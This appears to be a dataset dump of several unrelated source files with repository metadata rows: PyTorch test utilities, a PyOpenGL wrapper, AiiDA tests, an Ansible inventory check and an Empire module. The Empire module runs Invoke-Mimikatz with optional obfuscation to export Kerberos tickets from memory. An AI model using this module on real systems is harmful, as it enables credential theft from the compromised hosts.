@wraps(f)
def f_retry(*args, **kwargs):
mtries, mdelay = tries, delay
while mtries > 1:
try:
return f(*args, **kwargs)
except ExceptionToCheck as e:
msg = "%s, Retrying in %d seconds..." % (str(e), mdelay)
print(msg)
time.sleep(mdelay)
mtries -= 1
try:
return f(*args, **kwargs)
except ExceptionToCheck as e:
raise unittest.SkipTest(f"Skipping after {tries} consecutive {str(e)}") from e if skip_after_retries else e
return f_retry # true decorator
return deco_retry
# Methods for matrix generation
# Used in test_autograd.py and test_torch.py
def prod_single_zero(dim_size):
result = torch.randn(dim_size, dim_size)
result[0, 1] = 0
return result
def random_square_matrix_of_rank(l, rank, dtype=torch.double, device='cpu'):
assert rank <= l
A = torch.randn(l, l, dtype=dtype, device=device)
u, s, v = A.svd()
for i in range(l):
if i >= rank:
s[i] = 0
elif s[i] == 0:
s[i] = 1
return u.mm(torch.diag(s)).mm(v.transpose(0, 1))
def random_symmetric_matrix(l, *batches, **kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batches + (l, l)), dtype=dtype, device=device)
A = (A + A.transpose(-2, -1)).div_(2)
return A
def random_symmetric_psd_matrix(l, *batches, **kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batches + (l, l)), dtype=dtype, device=device)
return torch.matmul(A, A.transpose(-2, -1))
def random_symmetric_pd_matrix(matrix_size, *batch_dims, **kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batch_dims + (matrix_size, matrix_size)),
dtype=dtype, device=device)
return torch.matmul(A, A.transpose(-2, -1)) \
+ torch.eye(matrix_size, dtype=dtype, device=device) * 1e-5
def make_nonzero_det(A, sign=None, min_singular_value=0.1):
u, s, v = A.svd()
s.clamp_(min=min_singular_value)
A = torch.matmul(u, torch.matmul(torch.diag_embed(s), v.transpose(-2, -1)))
det = A.det()
if sign is not None:
if A.dim() == 2:
det = det.item()
if (det < 0) ^ (sign < 0):
A[0, :].neg_()
else:
cond = ((det < 0) ^ (sign < 0)).nonzero()
if cond.size(0) > 0:
for i in range(cond.size(0)):
A[list(cond[i])][0, :].neg_()
return A
def random_fullrank_matrix_distinct_singular_value(matrix_size, *batch_dims,
**kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
silent = kwargs.get("silent", False)
if silent and not torch._C.has_lapack:
return torch.ones(matrix_size, matrix_size, dtype=dtype, device=device)
A = torch.randn(batch_dims + (matrix_size, matrix_size), dtype=dtype, device=device)
u, _, v = A.svd()
s = torch.arange(1., matrix_size + 1, dtype=dtype, device=device).mul_(1.0 / (matrix_size + 1)).diag()
return u.matmul(s.expand(batch_dims + (matrix_size, matrix_size)).matmul(v.transpose(-2, -1)))
def random_matrix(rows, columns, *batch_dims, **kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
silent = kwargs.get("silent", False)
singular = kwargs.get("singular", False)
if silent and not torch._C.has_lapack:
return torch.ones(rows, columns, dtype=dtype, device=device)
A = torch.randn(batch_dims + (rows, columns), dtype=dtype, device=device)
u, _, v = A.svd(some=False)
s = torch.zeros(rows, columns, dtype=dtype, device=device)
k = min(rows, columns)
for i in range(k):
s[i, i] = float(i + 1) / (k + 1)
if singular:
# make matrix singular
s[k - 1, k - 1] = 0
if k > 2:
# increase the order of singularity so that the pivoting
# in LU factorization will be non-trivial
s[0, 0] = 0
return u.matmul(s.expand(batch_dims + (rows, columns)).matmul(v.transpose(-2, -1)))
def random_lowrank_matrix(rank, rows, columns, *batch_dims, **kwargs):
B = random_matrix(rows, rank, *batch_dims, **kwargs)
C = random_matrix(rank, columns, *batch_dims, **kwargs)
return B.matmul(C)
def random_sparse_matrix(rows, columns, density=0.01, **kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
singular = kwargs.get("singular", False)
k = min(rows, columns)
nonzero_elements = max(min(rows, columns), int(rows * columns * density))
row_indices = [i % rows for i in range(nonzero_elements)]
column_indices = [i % columns for i in range(nonzero_elements)]
random.shuffle(column_indices)
indices = [row_indices, column_indices]
values = torch.randn(nonzero_elements, dtype=dtype, device=device)
# ensure that the diagonal dominates
values *= torch.tensor([-float(i - j)**2 for i, j in zip(*indices)], dtype=dtype, device=device).exp()
A = torch.sparse_coo_tensor(indices, values, (rows, columns), device=device)
return A.coalesce()
def random_sparse_pd_matrix(matrix_size, density=0.01, **kwargs):
import math
torch = kwargs.get('torch', globals()['torch'])
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
data = dict([((i, i), float(i + 1) / matrix_size)
for i in range(matrix_size)])
def multiply(data, N, i, j, cs, sn, left=True):
for k in range(N):
if left:
ik, jk = (k, i), (k, j)
else:
ik, jk = (i, k), (j, k)
aik, ajk = data.get(ik, 0), data.get(jk, 0)
aik, ajk = cs * aik + sn * ajk, -sn * aik + cs * ajk
if aik:
data[ik] = aik
else:
data.pop(ik, None)
if ajk:
data[jk] = ajk
else:
data.pop(jk, None)
target_nnz = density * matrix_size * matrix_size
while len(data) < target_nnz:
i = random.randint(0, matrix_size - 1)
j = random.randint(0, matrix_size - 1)
if i != j:
theta = random.uniform(0, 2 * math.pi)
cs = math.cos(theta)
sn = math.sin(theta)
multiply(data, matrix_size, i, j, cs, sn, left=True)
multiply(data, matrix_size, i, j, cs, sn, left=False)
icoords, jcoords, values = [], [], []
for (i, j), v in sorted(data.items()):
icoords.append(i)
jcoords.append(j)
values.append(v)
indices = [icoords, jcoords]
return torch.sparse_coo_tensor(indices, values, (matrix_size, matrix_size), dtype=dtype, device=device)
def do_test_dtypes(self, dtypes, layout, device):
for dtype in dtypes:
if dtype != torch.float16:
out = torch.zeros((2, 3), dtype=dtype, layout=layout, device=device)
self.assertIs(dtype, out.dtype)
self.assertIs(layout, out.layout)
self.assertEqual(device, out.device)
def do_test_empty_full(self, dtypes, layout, device):
shape = torch.Size([2, 3])
def check_value(tensor, dtype, layout, device, value, requires_grad):
self.assertEqual(shape, tensor.shape)
self.assertIs(dtype, tensor.dtype)
self.assertIs(layout, tensor.layout)
self.assertEqual(tensor.requires_grad, requires_grad)
if tensor.is_cuda and device is not None:
self.assertEqual(device, tensor.device)
if value is not None:
fill = tensor.new(shape).fill_(value)
self.assertEqual(tensor, fill)
def get_int64_dtype(dtype):
module = '.'.join(str(dtype).split('.')[1:-1])
if not module:
return torch.int64
return operator.attrgetter(module)(torch).int64
default_dtype = torch.get_default_dtype()
check_value(torch.empty(shape), default_dtype, torch.strided, -1, None, False)
check_value(torch.full(shape, -5.), default_dtype, torch.strided, -1, None, False)
for dtype in dtypes:
for rg in {dtype.is_floating_point, False}:
int64_dtype = get_int64_dtype(dtype)
v = torch.empty(shape, dtype=dtype, device=device, layout=layout, requires_grad=rg)
check_value(v, dtype, layout, device, None, rg)
out = v.new()
check_value(torch.empty(shape, out=out, device=device, layout=layout, requires_grad=rg),
dtype, layout, device, None, rg)
check_value(v.new_empty(shape), dtype, layout, device, None, False)
check_value(v.new_empty(shape, dtype=int64_dtype, device=device, requires_grad=False),
int64_dtype, layout, device, None, False)
check_value(torch.empty_like(v), dtype, layout, device, None, False)
check_value(torch.empty_like(v, dtype=int64_dtype, layout=layout, device=device, requires_grad=False),
int64_dtype, layout, device, None, False)
if dtype is not torch.float16 and layout != torch.sparse_coo:
fv = 3
v = torch.full(shape, fv, dtype=dtype, layout=layout, device=device, requires_grad=rg)
check_value(v, dtype, layout, device, fv, rg)
check_value(v.new_full(shape, fv + 1), dtype, layout, device, fv + 1, False)
out = v.new()
check_value(torch.full(shape, fv + 2, out=out, device=device, layout=layout, requires_grad=rg),
dtype, layout, device, fv + 2, rg)
check_value(v.new_full(shape, fv + 3, dtype=int64_dtype, device=device, requires_grad=False),
int64_dtype, layout, device, fv + 3, False)
check_value(torch.full_like(v, fv + 4), dtype, layout, device, fv + 4, False)
check_value(torch.full_like(v, fv + 5,
dtype=int64_dtype, layout=layout, device=device, requires_grad=False),
int64_dtype, layout, device, fv + 5, False)
THESE_TAKE_WAY_TOO_LONG = {
'test_Conv3d_groups',
'test_conv_double_backward',
'test_conv_double_backward_groups',
'test_Conv3d_dilated',
'test_Conv3d_stride_padding',
'test_Conv3d_dilated_strided',
'test_Conv3d',
'test_Conv2d_dilated',
'test_ConvTranspose3d_dilated',
'test_ConvTranspose2d_dilated',
'test_snli',
'test_Conv2d',
'test_Conv2d_padding',
'test_ConvTranspose2d_no_bias',
'test_ConvTranspose2d',
'test_ConvTranspose3d',
'test_Conv2d_no_bias',
'test_matmul_4d_4d',
'test_multinomial_invalid_probs',
}
running_script_path = None
def set_running_script_path():
global running_script_path
try:
running_file = os.path.abspath(os.path.realpath(sys.argv[0]))
if running_file.endswith('.py'): # skip if the running file is not a script
running_script_path = running_file
except Exception:
pass
def check_test_defined_in_running_script(test_case):
if running_script_path is None:
return
test_case_class_file = os.path.abspath(os.path.realpath(inspect.getfile(test_case.__class__)))
assert test_case_class_file == running_script_path, "Class of loaded TestCase \"{}\" " \
"is not defined in the running script \"{}\", but in \"{}\". Did you " \
"accidentally import a unittest.TestCase from another file?".format(
test_case.id(), running_script_path, test_case_class_file)
def load_tests(loader, tests, pattern):
set_running_script_path()
test_suite = unittest.TestSuite()
for test_group in tests:
for test in test_group:
check_test_defined_in_running_script(test)
test_suite.addTest(test)
return test_suite
class BytesIOContext(io.BytesIO):
def __enter__(self):
return self
def __exit__(self, *args):
pass
def _assertGradAndGradgradChecks(test_case, apply_fn, inputs):
# call assert function rather than returning a bool since it's nicer
test_case.assertTrue(gradcheck(apply_fn, inputs))
test_case.assertTrue(gradgradcheck(apply_fn, inputs))
dtype2prec_DONTUSE = {torch.float: 1e-5,
torch.double: 1e-5,
torch.half: 1e-2,
torch.bfloat16: 1e-1}
| true | true |
f70ff7b5f910ec0e2e5f617995f5bf4ccc679ff6 | 1,220 | py | Python | deep-rl/lib/python2.7/site-packages/OpenGL/GLES2/EXT/robustness.py | ShujaKhalid/deep-rl | 99c6ba6c3095d1bfdab81bd01395ced96bddd611 | [
"MIT"
] | 3 | 2019-04-01T11:03:04.000Z | 2019-12-31T02:17:15.000Z | deep-rl/lib/python2.7/site-packages/OpenGL/GLES2/EXT/robustness.py | ShujaKhalid/deep-rl | 99c6ba6c3095d1bfdab81bd01395ced96bddd611 | [
"MIT"
] | 1 | 2021-02-08T20:34:54.000Z | 2021-02-08T20:34:54.000Z | deep-rl/lib/python2.7/site-packages/OpenGL/GLES2/EXT/robustness.py | ShujaKhalid/deep-rl | 99c6ba6c3095d1bfdab81bd01395ced96bddd611 | [
"MIT"
] | 1 | 2018-06-07T22:31:11.000Z | 2018-06-07T22:31:11.000Z | '''OpenGL extension EXT.robustness
This module customises the behaviour of the
OpenGL.raw.GLES2.EXT.robustness to provide a more
Python-friendly API
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/EXT/robustness.txt
'''
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.EXT.robustness import *
from OpenGL.raw.GLES2.EXT.robustness import _EXTENSION_NAME
def glInitRobustnessEXT():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
# INPUT glReadnPixelsEXT.data size not checked against bufSize
glReadnPixelsEXT=wrapper.wrapper(glReadnPixelsEXT).setInputArraySize(
'data', None
)
# INPUT glGetnUniformfvEXT.params size not checked against bufSize
glGetnUniformfvEXT=wrapper.wrapper(glGetnUniformfvEXT).setInputArraySize(
'params', None
)
# INPUT glGetnUniformivEXT.params size not checked against bufSize
glGetnUniformivEXT=wrapper.wrapper(glGetnUniformivEXT).setInputArraySize(
'params', None
)
### END AUTOGENERATED SECTION | 35.882353 | 73 | 0.811475 | from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.EXT.robustness import *
from OpenGL.raw.GLES2.EXT.robustness import _EXTENSION_NAME
def glInitRobustnessEXT():
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
glReadnPixelsEXT=wrapper.wrapper(glReadnPixelsEXT).setInputArraySize(
'data', None
)
glGetnUniformfvEXT=wrapper.wrapper(glGetnUniformfvEXT).setInputArraySize(
'params', None
)
glGetnUniformivEXT=wrapper.wrapper(glGetnUniformivEXT).setInputArraySize(
'params', None
)
| true | true |
f70ff8b39f836eb8b184cb1a2cede38cdd93a78e | 6,628 | py | Python | tests/orm/nodes/data/test_base.py | azadoks/aiida-core | b806b7fef8fc79090deccfe2019b77cb922e0581 | [
"MIT",
"BSD-3-Clause"
] | 180 | 2019-07-12T07:45:26.000Z | 2022-03-22T13:16:57.000Z | tests/orm/nodes/data/test_base.py | azadoks/aiida-core | b806b7fef8fc79090deccfe2019b77cb922e0581 | [
"MIT",
"BSD-3-Clause"
] | 2,325 | 2019-07-04T13:41:44.000Z | 2022-03-31T12:17:10.000Z | tests/orm/nodes/data/test_base.py | azadoks/aiida-core | b806b7fef8fc79090deccfe2019b77cb922e0581 | [
"MIT",
"BSD-3-Clause"
] | 88 | 2019-07-06T01:42:39.000Z | 2022-03-18T14:20:09.000Z | # -*- coding: utf-8 -*-
###########################################################################
# Copyright (c), The AiiDA team. All rights reserved. #
# This file is part of the AiiDA code. #
# #
# The code is hosted on GitHub at https://github.com/aiidateam/aiida-core #
# For further information on the license, see the LICENSE.txt file #
# For further information please visit http://www.aiida.net #
###########################################################################
# pylint: disable=invalid-name
"""Tests for :class:`aiida.orm.nodes.data.base.BaseType` classes."""
import operator
import pytest
from aiida.orm import Bool, Float, Int, NumericType, Str, load_node
@pytest.mark.usefixtures('clear_database_before_test')
@pytest.mark.parametrize(
'node_type, default, value', [
(Bool, False, True),
(Int, 0, 5),
(Float, 0.0, 5.5),
(Str, '', 'a'),
]
)
def test_create(node_type, default, value):
"""Test the creation of the ``BaseType`` nodes."""
node = node_type()
assert node.value == default
node = node_type(value)
assert node.value == value
@pytest.mark.usefixtures('clear_database_before_test')
@pytest.mark.parametrize('node_type', [Bool, Float, Int, Str])
def test_store_load(node_type):
"""Test ``BaseType`` node storing and loading."""
node = node_type()
node.store()
loaded = load_node(node.pk)
assert node.value == loaded.value
@pytest.mark.usefixtures('clear_database_before_test')
def test_modulo():
"""Test ``Int`` modulus operation."""
term_a = Int(12)
term_b = Int(10)
assert term_a % term_b == 2
assert isinstance(term_a % term_b, NumericType)
assert term_a % 10 == 2
assert isinstance(term_a % 10, NumericType)
assert 12 % term_b == 2
assert isinstance(12 % term_b, NumericType)
@pytest.mark.usefixtures('clear_database_before_test')
@pytest.mark.parametrize('node_type, a, b', [
(Int, 3, 5),
(Float, 1.2, 5.5),
])
def test_add(node_type, a, b):
"""Test addition for ``Int`` and ``Float`` nodes."""
node_a = node_type(a)
node_b = node_type(b)
result = node_a + node_b
assert isinstance(result, node_type)
assert result.value == a + b
# Node and native (both ways)
result = node_a + b
assert isinstance(result, node_type)
assert result.value == a + b
result = a + node_b
assert isinstance(result, node_type)
assert result.value == a + b
# Inplace
result = node_type(a)
result += node_b
assert isinstance(result, node_type)
assert result.value == a + b
@pytest.mark.usefixtures('clear_database_before_test')
@pytest.mark.parametrize('node_type, a, b', [
(Int, 3, 5),
(Float, 1.2, 5.5),
])
def test_multiplication(node_type, a, b):
"""Test floats multiplication."""
node_a = node_type(a)
node_b = node_type(b)
# Check multiplication
result = node_a * node_b
assert isinstance(result, node_type)
assert result.value == a * b
# Check multiplication Node and native (both ways)
result = node_a * b
assert isinstance(result, node_type)
assert result.value == a * b
result = a * node_b
assert isinstance(result, node_type)
assert result.value == a * b
# Inplace
result = node_type(a)
result *= node_b
assert isinstance(result, node_type)
assert result.value == a * b
@pytest.mark.usefixtures('clear_database_before_test')
@pytest.mark.parametrize('node_type, a, b', [
(Int, 3, 5),
(Float, 1.2, 5.5),
])
@pytest.mark.usefixtures('clear_database_before_test')
def test_division(node_type, a, b):
"""Test the ``BaseType`` normal division operator."""
node_a = node_type(a)
node_b = node_type(b)
result = node_a / node_b
assert result == a / b
assert isinstance(result, Float) # Should be a `Float` for both node types
@pytest.mark.usefixtures('clear_database_before_test')
@pytest.mark.parametrize('node_type, a, b', [
(Int, 3, 5),
(Float, 1.2, 5.5),
])
@pytest.mark.usefixtures('clear_database_before_test')
def test_division_integer(node_type, a, b):
"""Test the ``Int`` integer division operator."""
node_a = node_type(a)
node_b = node_type(b)
result = node_a // node_b
assert result == a // b
assert isinstance(result, node_type)
@pytest.mark.usefixtures('clear_database_before_test')
@pytest.mark.parametrize('node_type, base, power', [
(Int, 5, 2),
(Float, 3.5, 3),
])
def test_power(node_type, base, power):
"""Test power operator."""
node_base = node_type(base)
node_power = node_type(power)
result = node_base**node_power
assert result == base**power
assert isinstance(result, node_type)
@pytest.mark.usefixtures('clear_database_before_test')
@pytest.mark.parametrize('node_type, a, b', [
(Int, 5, 2),
(Float, 3.5, 3),
])
def test_modulus(node_type, a, b):
"""Test modulus operator."""
node_a = node_type(a)
node_b = node_type(b)
assert node_a % node_b == a % b
assert isinstance(node_a % node_b, node_type)
assert node_a % b == a % b
assert isinstance(node_a % b, node_type)
assert a % node_b == a % b
assert isinstance(a % node_b, node_type)
@pytest.mark.usefixtures('clear_database_before_test')
@pytest.mark.parametrize(
'opera', [
operator.add, operator.mul, operator.pow, operator.lt, operator.le, operator.gt, operator.ge, operator.iadd,
operator.imul
]
)
def test_operator(opera):
"""Test operations between Int and Float objects."""
node_a = Float(2.2)
node_b = Int(3)
for node_x, node_y in [(node_a, node_b), (node_b, node_a)]:
res = opera(node_x, node_y)
c_val = opera(node_x.value, node_y.value)
assert res._type == type(c_val) # pylint: disable=protected-access
assert res == opera(node_x.value, node_y.value)
@pytest.mark.usefixtures('clear_database_before_test')
@pytest.mark.parametrize('node_type, a, b', [
(Bool, False, True),
(Int, 2, 5),
(Float, 2.5, 5.5),
(Str, 'a', 'b'),
])
def test_equality(node_type, a, b):
"""Test equality comparison for the base types."""
node_a = node_type(a)
node_a_clone = node_type(a)
node_b = node_type(b)
# Test equality comparison with Python base types
assert node_a == a
assert node_a != b
# Test equality comparison with other `BaseType` nodes
assert node_a == node_a_clone
assert node_a != node_b
| 28.817391 | 116 | 0.628093 | true | true | |
f70ff8c17dab8983b21b6b77a9aa402599833f23 | 2,391 | py | Python | lib/python3.8/site-packages/ansible_collections/community/general/tests/integration/targets/inventory_kubevirt/inventory_diff.py | cjsteel/python3-venv-ansible-2.10.5 | c95395c4cae844dc66fddde9b4343966f4b2ecd5 | [
"Apache-1.1"
] | 5 | 2020-12-16T21:42:09.000Z | 2022-03-28T16:04:32.000Z | .ansible/collections/ansible_collections/community/general/tests/integration/targets/inventory_kubevirt/inventory_diff.py | chronicc/proving-ground | 3e392122a05fb8383a3700954baebb0df330e9e3 | [
"MIT"
] | null | null | null | .ansible/collections/ansible_collections/community/general/tests/integration/targets/inventory_kubevirt/inventory_diff.py | chronicc/proving-ground | 3e392122a05fb8383a3700954baebb0df330e9e3 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import json
import sys
def check_hosts(contrib, plugin):
contrib_hosts = sorted(contrib['_meta']['hostvars'].keys())
plugin_hosts = sorted(plugin['_meta']['hostvars'].keys())
assert contrib_hosts == plugin_hosts
return contrib_hosts, plugin_hosts
def check_groups(contrib, plugin):
contrib_groups = set(contrib.keys())
plugin_groups = set(plugin.keys())
missing_groups = contrib_groups.difference(plugin_groups)
if missing_groups:
print("groups: %s are missing from the plugin" % missing_groups)
assert not missing_groups
return contrib_groups, plugin_groups
def check_host_vars(key, value, plugin, host):
# tags are a dict in the plugin
if key.startswith('ec2_tag'):
print('assert tag', key, value)
assert 'tags' in plugin['_meta']['hostvars'][host], 'b file does not have tags in host'
btags = plugin['_meta']['hostvars'][host]['tags']
tagkey = key.replace('ec2_tag_', '')
assert tagkey in btags, '%s tag not in b file host tags' % tagkey
assert value == btags[tagkey], '%s != %s' % (value, btags[tagkey])
else:
print('assert var', key, value, key in plugin['_meta']['hostvars'][host], plugin['_meta']['hostvars'][host].get(key))
assert key in plugin['_meta']['hostvars'][host], "%s not in b's %s hostvars" % (key, host)
assert value == plugin['_meta']['hostvars'][host][key], "%s != %s" % (value, plugin['_meta']['hostvars'][host][key])
def main():
# a should be the source of truth (the script output)
a = sys.argv[1]
# b should be the thing to check (the plugin output)
b = sys.argv[2]
with open(a, 'r') as f:
adata = json.loads(f.read())
with open(b, 'r') as f:
bdata = json.loads(f.read())
print(adata)
print(bdata)
# all hosts should be present obviously
ahosts, bhosts = check_hosts(adata, bdata)
# all groups should be present obviously
agroups, bgroups = check_groups(adata, bdata)
# check host vars can be reconstructed
for ahost in ahosts:
contrib_host_vars = adata['_meta']['hostvars'][ahost]
for key, value in contrib_host_vars.items():
check_host_vars(key, value, bdata, ahost)
if __name__ == "__main__":
main()
| 33.676056 | 125 | 0.649101 |
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import json
import sys
def check_hosts(contrib, plugin):
contrib_hosts = sorted(contrib['_meta']['hostvars'].keys())
plugin_hosts = sorted(plugin['_meta']['hostvars'].keys())
assert contrib_hosts == plugin_hosts
return contrib_hosts, plugin_hosts
def check_groups(contrib, plugin):
contrib_groups = set(contrib.keys())
plugin_groups = set(plugin.keys())
missing_groups = contrib_groups.difference(plugin_groups)
if missing_groups:
print("groups: %s are missing from the plugin" % missing_groups)
assert not missing_groups
return contrib_groups, plugin_groups
def check_host_vars(key, value, plugin, host):
if key.startswith('ec2_tag'):
print('assert tag', key, value)
assert 'tags' in plugin['_meta']['hostvars'][host], 'b file does not have tags in host'
btags = plugin['_meta']['hostvars'][host]['tags']
tagkey = key.replace('ec2_tag_', '')
assert tagkey in btags, '%s tag not in b file host tags' % tagkey
assert value == btags[tagkey], '%s != %s' % (value, btags[tagkey])
else:
print('assert var', key, value, key in plugin['_meta']['hostvars'][host], plugin['_meta']['hostvars'][host].get(key))
assert key in plugin['_meta']['hostvars'][host], "%s not in b's %s hostvars" % (key, host)
assert value == plugin['_meta']['hostvars'][host][key], "%s != %s" % (value, plugin['_meta']['hostvars'][host][key])
def main():
# a should be the source of truth (the script output)
a = sys.argv[1]
# b should be the thing to check (the plugin output)
b = sys.argv[2]
with open(a, 'r') as f:
adata = json.loads(f.read())
with open(b, 'r') as f:
bdata = json.loads(f.read())
print(adata)
print(bdata)
# all hosts should be present obviously
ahosts, bhosts = check_hosts(adata, bdata)
# all groups should be present obviously
agroups, bgroups = check_groups(adata, bdata)
# check host vars can be reconstructed
for ahost in ahosts:
contrib_host_vars = adata['_meta']['hostvars'][ahost]
for key, value in contrib_host_vars.items():
check_host_vars(key, value, bdata, ahost)
if __name__ == "__main__":
main()
| true | true |
f70ff9f7bc88d87ca48ff19099b4239c3f5439c9 | 3,679 | py | Python | lib/modules/powershell/credentials/mimikatz/extract_tickets.py | RedBulletTooling/Empire | 3f4146bf8221ad3d2dcbe8ef4a61dabd66b86e0d | [
"BSD-3-Clause"
] | 3 | 2019-11-30T06:12:45.000Z | 2021-06-10T05:35:33.000Z | lib/modules/powershell/credentials/mimikatz/extract_tickets.py | RedBulletTooling/Empire | 3f4146bf8221ad3d2dcbe8ef4a61dabd66b86e0d | [
"BSD-3-Clause"
] | 20 | 2020-03-11T03:58:21.000Z | 2020-03-12T03:59:38.000Z | lib/modules/powershell/credentials/mimikatz/extract_tickets.py | RedBulletTooling/Empire | 3f4146bf8221ad3d2dcbe8ef4a61dabd66b86e0d | [
"BSD-3-Clause"
] | null | null | null | from __future__ import print_function
from builtins import str
from builtins import object
from lib.common import helpers
import threading
class Module(object):
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-Mimikatz extract kerberos tickets.',
'Author': ['@JosephBialek', '@gentilkiwi'],
'Description': ("Runs PowerSploit's Invoke-Mimikatz function "
"to extract kerberos tickets from memory in base64-encoded form."),
'Background' : True,
'OutputExtension' : None,
'NeedsAdmin' : False,
'OpsecSafe' : True,
'Language' : 'powershell',
'MinLanguageVersion' : '2',
'Comments': [
'http://clymb3r.wordpress.com/',
'http://blog.gentilkiwi.com'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
# used to protect self.http and self.mainMenu.conn during threaded listener access
self.lock = threading.Lock()
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
# this might not be necessary. Could probably be achieved by just callingg mainmenu.get_db but all the other files have
# implemented it in place. Might be worthwhile to just make a database handling file -Hubbl3
def get_db_connection(self):
"""
Returns the cursor for SQLlite DB
"""
self.lock.acquire()
self.mainMenu.conn.row_factory = None
self.lock.release()
return self.mainMenu.conn
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
scriptEnd = "Invoke-Mimikatz -Command '\"standard::base64\" \"kerberos::list /export\"'"
if obfuscate:
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
# Get the random function name generated at install and patch the stager with the proper function name
conn = self.get_db_connection()
self.lock.acquire()
cur = conn.cursor()
cur.execute("SELECT Invoke_Mimikatz FROM functions")
replacement = cur.fetchone()
cur.close()
self.lock.release()
script = script.replace("Invoke-Mimikatz", replacement[0])
return script
| 34.707547 | 127 | 0.594183 | from __future__ import print_function
from builtins import str
from builtins import object
from lib.common import helpers
import threading
class Module(object):
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-Mimikatz extract kerberos tickets.',
'Author': ['@JosephBialek', '@gentilkiwi'],
'Description': ("Runs PowerSploit's Invoke-Mimikatz function "
"to extract kerberos tickets from memory in base64-encoded form."),
'Background' : True,
'OutputExtension' : None,
'NeedsAdmin' : False,
'OpsecSafe' : True,
'Language' : 'powershell',
'MinLanguageVersion' : '2',
'Comments': [
'http://clymb3r.wordpress.com/',
'http://blog.gentilkiwi.com'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
# used to protect self.http and self.mainMenu.conn during threaded listener access
self.lock = threading.Lock()
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
# this might not be necessary. Could probably be achieved by just callingg mainmenu.get_db but all the other files have
# implemented it in place. Might be worthwhile to just make a database handling file -Hubbl3
def get_db_connection(self):
self.lock.acquire()
self.mainMenu.conn.row_factory = None
self.lock.release()
return self.mainMenu.conn
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
scriptEnd = "Invoke-Mimikatz -Command '\"standard::base64\" \"kerberos::list /export\"'"
if obfuscate:
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
# Get the random function name generated at install and patch the stager with the proper function name
conn = self.get_db_connection()
self.lock.acquire()
cur = conn.cursor()
cur.execute("SELECT Invoke_Mimikatz FROM functions")
replacement = cur.fetchone()
cur.close()
self.lock.release()
script = script.replace("Invoke-Mimikatz", replacement[0])
return script
| true | true |
f70ffa952087ecc203a557dd249439198e434117 | 31 | py | Python | esphome/components/version/__init__.py | OttoWinter/esphomeyaml | 6a85259e4d6d1b0a0f819688b8e555efcb99ecb0 | [
"MIT"
] | 249 | 2018-04-07T12:04:11.000Z | 2019-01-25T01:11:34.000Z | esphome/components/adc/__init__.py | OttoWinter/esphomeyaml | 6a85259e4d6d1b0a0f819688b8e555efcb99ecb0 | [
"MIT"
] | 243 | 2018-04-11T16:37:11.000Z | 2019-01-25T16:50:37.000Z | esphome/components/md5/__init__.py | OttoWinter/esphomeyaml | 6a85259e4d6d1b0a0f819688b8e555efcb99ecb0 | [
"MIT"
] | 40 | 2018-04-10T05:50:14.000Z | 2019-01-25T15:20:36.000Z | CODEOWNERS = ["@esphome/core"]
| 15.5 | 30 | 0.677419 | CODEOWNERS = ["@esphome/core"]
| true | true |
f70ffac8915dec77e469e6bc0f0f06e1bcd32725 | 1,831 | py | Python | s2e_env/utils/repos.py | benquike/s2e-env | 3a71fee8f80b3318ad6b971c0bb42b5f60b27d8b | [
"BSD-3-Clause"
